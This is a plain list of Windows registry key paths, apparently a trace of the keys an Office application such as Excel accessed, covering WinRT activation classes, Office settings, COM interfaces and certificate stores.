HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\ActivateOnHostFlags
HKEY_USERS\.default\Software\Microsoft\IdentityCRL\AppData\appid=00000000480728C5&clientid=00000000480728C5
HKEY_USERS\.default\Software\Microsoft\IdentityCRL\AppData\appid=00000000480728C5&clientid=00000000480728C5\FirstParty
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\Knowledge
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\Placeholder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\Reset
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\ItemKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\ItemData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\SortKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\LastOperation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\PendingChanges\d150239a\1428838692\LastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1259\{00000000-0000-0000-0000-000000000000}\ListItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\ApplicationTheme.AppThemeAPI\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Personalization\Insights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Personalization\Insights
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\OfficeManagementState
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Cloud\office\16.0\common\officeupdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\office\16.0\common\officeupdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp\Excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp
HKEY_CURRENT_USER\Control Panel\International\Geo
HKEY_CURRENT_USER\Control Panel\International\Geo\Name
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common\Personalization
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Personalization
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Personalization\InProductProgramMessaging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Personalization\InProductProgramMessaging
HKEY_CURRENT_USER\Software\Classes\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\MiniNT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2527171340-3306644326-1278290521-1001
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
